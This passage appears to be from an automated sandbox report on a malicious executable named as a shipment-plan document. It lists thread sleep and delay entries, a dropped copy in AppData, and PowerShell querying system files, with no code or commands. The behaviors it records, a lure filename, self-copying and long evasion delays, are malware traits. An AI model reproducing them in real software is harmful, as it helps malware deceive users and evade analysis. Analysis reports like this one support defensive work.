Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597234s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597125s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -597016s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596891s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596766s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596656s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596543s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596436s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596328s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596219s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596109s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -596000s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595891s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595766s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595641s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595531s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595422s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595312s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595203s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -595094s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -594984s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -594875s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -594766s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -594641s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096 | Thread sleep time: -594516s >= -30000s | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 7408 | Thread sleep time: -922337203685477s >= -30000s | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -27670116110564310s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -600000s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599891s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 6776 | Thread sleep count: 1603 > 30 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 6776 | Thread sleep count: 8256 > 30 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599779s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599666s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599547s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599435s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599328s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599219s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599109s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -599000s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598891s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598781s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598671s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598562s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598453s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598342s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598234s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598125s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -598015s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597905s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597797s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597687s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597578s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597469s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597359s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597250s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597141s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -597030s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596922s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596812s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596703s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596594s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596469s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596359s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596250s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596140s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -596031s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595922s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595804s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595687s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595578s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595469s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595344s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595234s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595125s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -595015s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -594906s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -594797s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -594687s >= -30000s | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428 | Thread sleep time: -594578s >= -30000s | |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 600000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599781 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599672 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599563 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599453 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599344 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599219 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599109 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 599000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598781 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598672 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598562 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598453 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598344 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598219 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598109 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 598000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597781 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597672 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597562 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597451 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597344 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597234 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597125 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 597016 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596766 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596656 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596543 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596436 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596328 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596219 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596109 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 596000 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595891 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595766 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595641 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595531 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595422 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595312 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595203 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 595094 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594984 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594875 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594766 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594641 | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Thread delayed: delay time: 594516 | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 922337203685477 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 600000 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599891 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599779 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599666 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599547 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599435 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599328 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599219 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599109 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 599000 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598891 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598781 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598671 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598562 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598453 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598342 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598234 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598125 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 598015 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597905 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597797 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597687 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597578 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597469 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597359 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597250 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597141 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 597030 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596922 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596812 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596703 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596594 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596469 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596359 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596250 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596140 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 596031 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595922 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595804 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595687 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595578 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595469 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595344 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595234 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595125 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 595015 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594906 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594797 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594687 | |
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe | Thread delayed: delay time: 594578 | |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation | Jump to behavior |
